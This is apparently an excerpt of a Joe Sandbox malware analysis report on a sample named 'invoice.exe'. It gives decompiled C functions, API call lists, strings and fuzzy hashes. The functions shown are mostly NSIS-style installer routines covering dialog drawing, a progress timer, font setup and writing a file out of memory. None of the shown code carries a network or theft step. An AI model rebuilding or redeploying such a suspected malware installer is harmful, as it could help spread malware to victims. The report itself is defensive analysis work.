0x0040623f
0x00406243
0x00406244
0x00406247
0x0040624f
0x00406251
0x00406255
0x00000000
0x00000000
0x0040625b
0x00406260
0x00000000
0x00000000
0x00000000
0x00406260
0x00406265

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\invoice.exe",76793410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406227
CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406234
CharNextA.USER32(?,"C:\Users\user\Desktop\invoice.exe",76793410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406239
CharPrevA.USER32(?,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406249

Strings

*?|<>/":, xrefs: 00406217
C:\Users\user\AppData\Local\Temp\, xrefs: 004061D0
"C:\Users\user\Desktop\invoice.exe", xrefs: 0040620B

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\invoice.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-77870969
Opcode ID: 5f1665aab2a45dc98a0c2aad5c019af140aadccb050e4449eaa375ca2787231f
Instruction ID: ed3a47555f86895cac8e455d85beb05a749fa7fcd8deb799c497f9efd275ca90
Opcode Fuzzy Hash: 5f1665aab2a45dc98a0c2aad5c019af140aadccb050e4449eaa375ca2787231f
Instruction Fuzzy Hash: D111E26180579029FB3226380C44B776F884F6A760F1900BFE8D2722C3CA7C5C62966E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C61 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C61(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, "true", 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x415420; // 0xd02b5
					_t11 =  *0x42142c; // 0xd24e8
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402c6e
0x00402c7c
0x00402c82
0x00402c82
0x00402c90
0x00402c92
0x00402c98
0x00402c9f
0x00402ca1
0x00402ca1
0x00402cb7
0x00402cc7
0x00402cd9
0x00402cd9
0x00402ce1

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C7C
MulDiv.KERNEL32(000D02B5,00000064,000D24E8), ref: 00402CA7
wsprintfA.USER32 ref: 00402CB7
SetWindowTextA.USER32(?,?), ref: 00402CC7
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CD9

Strings

verifying installer: %d%%, xrefs: 00402CB1
$, xrefs: 00402C98

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%$$
API String ID: 1451636040-2655702876
Opcode ID: 8cf66896cf3f33f8ea8d40d262e26d06426d7b5af9806429cf1dba26c1fd6b47
Instruction ID: 537944924eabc97b3cccf86cf440a0916c3cc685b10ad000e4021125f5d30dc2
Opcode Fuzzy Hash: 8cf66896cf3f33f8ea8d40d262e26d06426d7b5af9806429cf1dba26c1fd6b47
Instruction Fuzzy Hash: 3401FF7164020DFBEF209F61DD09EEE37A9AB04305F008039FA06A92D0DBB999558F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040408D Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040408D(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x0040409f
0x00404133
0x00000000
0x00404133
0x004040b0
0x004040b4
0x00000000
0x00000000
0x004040ba
0x004040c3
0x004040c6
0x004040c6
0x004040cc
0x004040d2
0x004040d2
0x004040de
0x004040e4
0x004040eb
0x004040ee
0x004040f1
0x004040f3
0x004040f3
0x004040fb
0x00404101
0x00404101
0x0040410b
0x00404110
0x00404113
0x00404118
0x0040411b
0x0040411b
0x0040412b
0x0040412b
0x00000000

APIs

GetWindowLongA.USER32(?,000000EB), ref: 004040AA
GetSysColor.USER32(00000000), ref: 004040C6
SetTextColor.GDI32(?,00000000), ref: 004040D2
SetBkMode.GDI32(?,?), ref: 004040DE
GetSysColor.USER32(?), ref: 004040F1
SetBkColor.GDI32(?,?), ref: 00404101
DeleteObject.GDI32(?), ref: 0040411B
CreateBrushIndirect.GDI32(?), ref: 00404125

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
Instruction ID: 2d9fb341b818c34885f35f6e6d755d1b55c6e7706bb7847a6dc6733995099f15
Opcode Fuzzy Hash: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
Instruction Fuzzy Hash: 1A216F71500704ABCB219F68DE08A4BBBF8AF41714F048939EAD5F66A0C734E948CB64

Uniqueness

Uniqueness Score: -1.00%

Function 100023D8 Relevance: 10.6, APIs: 7, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E100023D8(intOrPtr* _a4) {
				char _v80;
				intOrPtr _v84;
				short _v92;
				intOrPtr* _t22;
				void* _t24;
				intOrPtr _t25;
				signed int _t33;
				void* _t37;
				intOrPtr _t38;
				void* _t41;

				_t37 = E10001215();
				_t22 = _a4;
				_t38 =  *((intOrPtr*)(_t22 + 0x814));
				_v84 = _t38;
				_t41 = (_t38 + 0x41 << 5) + _t22;
				do {
					if( *((intOrPtr*)(_t41 - 4)) != 0xffffffff) {
					}
					_t33 =  *(_t41 - 8);
					if(_t33 <= 7) {
						switch( *((intOrPtr*)(_t33 * 4 +  &M100024FB))) {
							case 0:
								 *_t37 = 0;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x1000405c);
								goto L15;
							case 4:
								__ecx =  *0x1000405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x1000405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L15;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push( &_v80);
								_push( *__eax);
								__imp__StringFromGUID2();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x1000405c, __ebx, __ebx);
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfA(__edi, 0x10004000);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t24 =  *(_t41 + 0x14);
					if(_t24 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t41 - 4)) > 0)) {
						GlobalFree(_t24);
					}
					_t25 =  *((intOrPtr*)(_t41 + 0xc));
					if(_t25 != 0) {
						if(_t25 != 0xffffffff) {
							if(_t25 > 0) {
								E100012D1(_t25 - 1, _t37);
								goto L24;
							}
						} else {
							E10001266(_t37);
							L24:
						}
					}
					_v84 = _v84 - 1;
					_t41 = _t41 - 0x20;
				} while (_v84 >= 0);
				return GlobalFree(_t37);
			}

0x100023e4
0x100023e6
0x100023f0
0x100023f6
0x10002400
0x10002404
0x10002408
0x10002408
0x10002410
0x10002416
0x1000241c
0x00000000
0x10002423
0x00000000
0x00000000
0x10002427
0x00000000
0x00000000
0x10002431
0x00000000
0x00000000
0x10002441
0x00000000
0x00000000
0x1000246d
0x10002475
0x1000247f
0x10002481
0x10002486
0x00000000
0x00000000
0x10002449
0x1000244d
0x1000244f
0x10002450
0x10002452
0x10002462
0x10002469
0x00000000
0x00000000
0x1000248c
0x1000248e
0x10002494
0x1000249a
0x1000249a
0x00000000
0x00000000
0x1000241c
0x1000249d
0x1000249d
0x100024a2
0x100024b3
0x100024b3
0x100024b9
0x100024be
0x100024c3
0x100024cf
0x100024d4
0x00000000
0x100024d9
0x100024c5
0x100024c6
0x100024da
0x100024da
0x100024c3
0x100024db
0x100024df
0x100024e2
0x100024fa

APIs

Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

GlobalFree.KERNEL32(?), ref: 100024B3
GlobalFree.KERNEL32(00000000), ref: 100024ED

Memory Dump Source

Source File: 00000001.00000002.8818214645.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.8818183154.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.8818247570.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.8818279279.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_invoice.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9b8f7426cd7417a05f7efaca6ab9ef20acf91f7aea9c9defdea317c740d0f0ba
Instruction ID: c0db1d51d0d8beb2da32add46ec64f24e8f484468aa98c5ce89375ba0c102a5a
Opcode Fuzzy Hash: 9b8f7426cd7417a05f7efaca6ab9ef20acf91f7aea9c9defdea317c740d0f0ba
Instruction Fuzzy Hash: 0831A9B1504211EFF322DB94CCC4C2B7BBDEB853D4B118929FA4193228CB31AC94DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00404957 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404957(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404965
0x00404972
0x00404978
0x004049b6
0x004049b6
0x004049c5
0x004049cc
0x00000000
0x004049ce
0x0040497a
0x00404989
0x00404991
0x00404994
0x004049a6
0x004049ac
0x004049b3
0x00000000
0x004049b3
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404972
GetMessagePos.USER32 ref: 0040497A
ScreenToClient.USER32(?,?), ref: 00404994
SendMessageA.USER32(?,00001111,00000000,?), ref: 004049A6
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049CC

Strings

f, xrefs: 004049A8

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
Instruction ID: 403e93763916a0c69708d0661a5269b1e580af1e573dd698745729a1614bb606
Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
Instruction Fuzzy Hash: 02015EB190021DBAEB01DBA4DD85BFFBBFCAF55711F10412BBA50B61C0C7B499018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401D95 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401D95(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402A9F(2);
				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
				0x40b820->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b830 = E00402A9F(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
				 *0x40b837 = 1;
				 *0x40b834 = _t15 & 0x00000001;
				 *0x40b835 = _t15 & 0x00000002;
				 *0x40b836 = _t15 & 0x00000004;
				E00405F87(_t9, _t31, _t33, "Times New Roman",  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b820);
				_push(_t18);
				_push(_t33);
				E00405EC3();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401d95
0x00401da0
0x00401da2
0x00401daf
0x00401dc6
0x00401dcb
0x00401dd8
0x00401ddd
0x00401de1
0x00401dec
0x00401df3
0x00401e05
0x00401e0b
0x00401e10
0x00401e1a
0x00402577
0x00401569
0x004028f9
0x00402954
0x00402960

APIs

GetDC.USER32(?), ref: 00401D98
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
ReleaseDC.USER32(?,00000000), ref: 00401DCB
CreateFontIndirectA.GDI32(0040B820), ref: 00401E1A

Strings

Times New Roman, xrefs: 00401E00

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Times New Roman
API String ID: 3808545654-927190056
Opcode ID: 8d956707ffe88138eff2d14c933710156e05edfb94d5aae4ab48e4845a293012
Instruction ID: e9269c0f41cd5a79e17a17131fa0488204b4df503fc5c3e11bd14e9e74a55962
Opcode Fuzzy Hash: 8d956707ffe88138eff2d14c933710156e05edfb94d5aae4ab48e4845a293012
Instruction Fuzzy Hash: 24014072944344AEE7006BB4AE49BA97FE8EB15705F109439F141B61F2CB790405CF6D

Uniqueness

Uniqueness Score: -1.00%

Function 100021FA Relevance: 9.1, APIs: 6, Instructions: 137
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100021FA(void* __edx, intOrPtr _a4) {
				signed int _v4;
				void* _t36;
				signed int _t37;
				void* _t38;
				void* _t41;
				void* _t46;
				signed int* _t48;
				signed int* _t49;

				_v4 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t49 = (_v4 << 5) + _t9;
					_t36 = _t49[6];
					if(_t36 == 0) {
						goto L9;
					}
					_t46 = 0x1a;
					if(_t36 == _t46) {
						goto L9;
					}
					if(_t36 != 0xffffffff) {
						if(_t36 <= 0 || _t36 > 0x19) {
							_t49[6] = _t46;
						} else {
							_t36 = E100012AD(_t36 - 1);
							L10:
						}
						goto L11;
					} else {
						_t36 = E1000123B();
						L11:
						_t41 = _t36;
						_t13 =  &(_t49[2]); // 0x820
						_t48 = _t13;
						if(_t49[1] != 0xffffffff) {
						}
						_t37 =  *_t49;
						_t49[7] = _t49[7] & 0x00000000;
						if(_t37 > 7) {
							L27:
							_t38 = GlobalFree(_t41);
							if(_v4 == 0) {
								return _t38;
							}
							if(_v4 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v4 = _v4 + 1;
							} else {
								_v4 = _v4 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t37 * 4 +  &M1000237E))) {
								case 0:
									 *_t48 =  *_t48 & 0x00000000;
									goto L27;
								case 1:
									__eax = E100012FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E100012FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E10001224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x1000405c =  *0x1000405c +  *0x1000405c;
									__edi = GlobalAlloc(0x40,  *0x1000405c +  *0x1000405c);
									 *0x1000405c = MultiByteToWideChar(0, 0, __ebx,  *0x1000405c, __edi,  *0x1000405c);
									if( *__esi != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E100012FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x1000405c;
									__esi = __esi +  *0x10004064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E10001429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t36 = E10001224(0x10004034);
					goto L10;
				}
			}

0x1000220e
0x10002212
0x1000221d
0x1000221d
0x10002224
0x10002229
0x00000000
0x00000000
0x1000222d
0x10002230
0x00000000
0x00000000
0x10002235
0x10002240
0x10002250
0x10002247
0x10002249
0x1000225f
0x1000225f
0x00000000
0x10002237
0x10002237
0x10002260
0x10002264
0x10002266
0x10002266
0x10002269
0x10002269
0x10002271
0x10002273
0x1000227a
0x10002347
0x10002348
0x10002353
0x1000237d
0x1000237d
0x10002363
0x1000236f
0x10002365
0x10002365
0x10002365
0x00000000
0x10002280
0x10002280
0x00000000
0x10002287
0x00000000
0x00000000
0x10002290
0x00000000
0x00000000
0x1000229e
0x100022a1
0x00000000
0x00000000
0x100022aa
0x100022af
0x100022b2
0x100022b3
0x00000000
0x00000000
0x100022c0
0x100022cb
0x100022da
0x100022e3
0x10002306
0x10002309
0x100022e5
0x100022e9
0x100022ef
0x100022f0
0x100022f3
0x100022f4
0x100022f7
0x100022fe
0x100022fe
0x00000000
0x00000000
0x10002311
0x10002314
0x10002320
0x10002322
0x00000000
0x00000000
0x10002325
0x10002328
0x10002329
0x10002330
0x10002337
0x1000233a
0x1000233c
0x1000233f
0x00000000
0x00000000
0x10002280
0x1000227a
0x10002255
0x1000225a
0x00000000
0x1000225a

APIs

GlobalFree.KERNEL32(00000000), ref: 10002348

Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234

GlobalAlloc.KERNEL32(00000040,?), ref: 100022C5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022DA
GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E9
CLSIDFromString.OLE32(00000000,00000000), ref: 100022F7
GlobalFree.KERNEL32(00000000), ref: 100022FE

Memory Dump Source

Source File: 00000001.00000002.8818214645.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.8818183154.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.8818247570.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.8818279279.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_invoice.jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID:
API String ID: 3730416702-0
Opcode ID: 0f1d2088a070cebd5915530b0a964975e4ea41447dfd67459970790859c4aece
Instruction ID: a642113aa4013a2ca06c871554e8d399cf46bf4099943ddf9e0960cc50565d32
Opcode Fuzzy Hash: 0f1d2088a070cebd5915530b0a964975e4ea41447dfd67459970790859c4aece
Instruction Fuzzy Hash: A941BCB1508311EFF320DF648C84B6AB7E8FF443D0F11892AF946D61A9DB34AA40CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00402736 Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402736(int __ebx) {
				void* _t26;
				long _t31;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402AC1(0xfffffff0);
				 *(_t56 - 0x34) = _t23;
				if(E0040596A(_t50) == 0) {
					E00402AC1(0xffffffed);
				}
				E00405AD9(_t50);
				_t26 = E00405AFE(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f418;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E004031A9(_t45);
						E00403193(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x3c) = _t54;
						if(_t54 != _t45) {
							E00402F81( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x84) =  *_t54;
								E00405AB9( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x84);
							}
							GlobalFree( *(_t56 - 0x3c));
						}
						E00405BA5( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E00402F81(0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x34));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x00402736
0x00402738
0x00402744
0x00402747
0x00402751
0x00402755
0x00402755
0x0040275b
0x00402768
0x00402770
0x00402773
0x00402779
0x00402787
0x0040278c
0x00402790
0x00402793
0x0040279c
0x004027a8
0x004027ac
0x004027af
0x004027b9
0x004027de
0x004027c0
0x004027c5
0x004027cd
0x004027d3
0x004027d8
0x004027d8
0x004027e5
0x004027e5
0x004027f2
0x004027f8
0x0040280a
0x0040280a
0x00402810
0x00402810
0x0040281b
0x0040281c
0x00402820
0x00402824
0x0040282a
0x0040282a
0x00402831
0x00402237
0x00402954
0x00402960

APIs

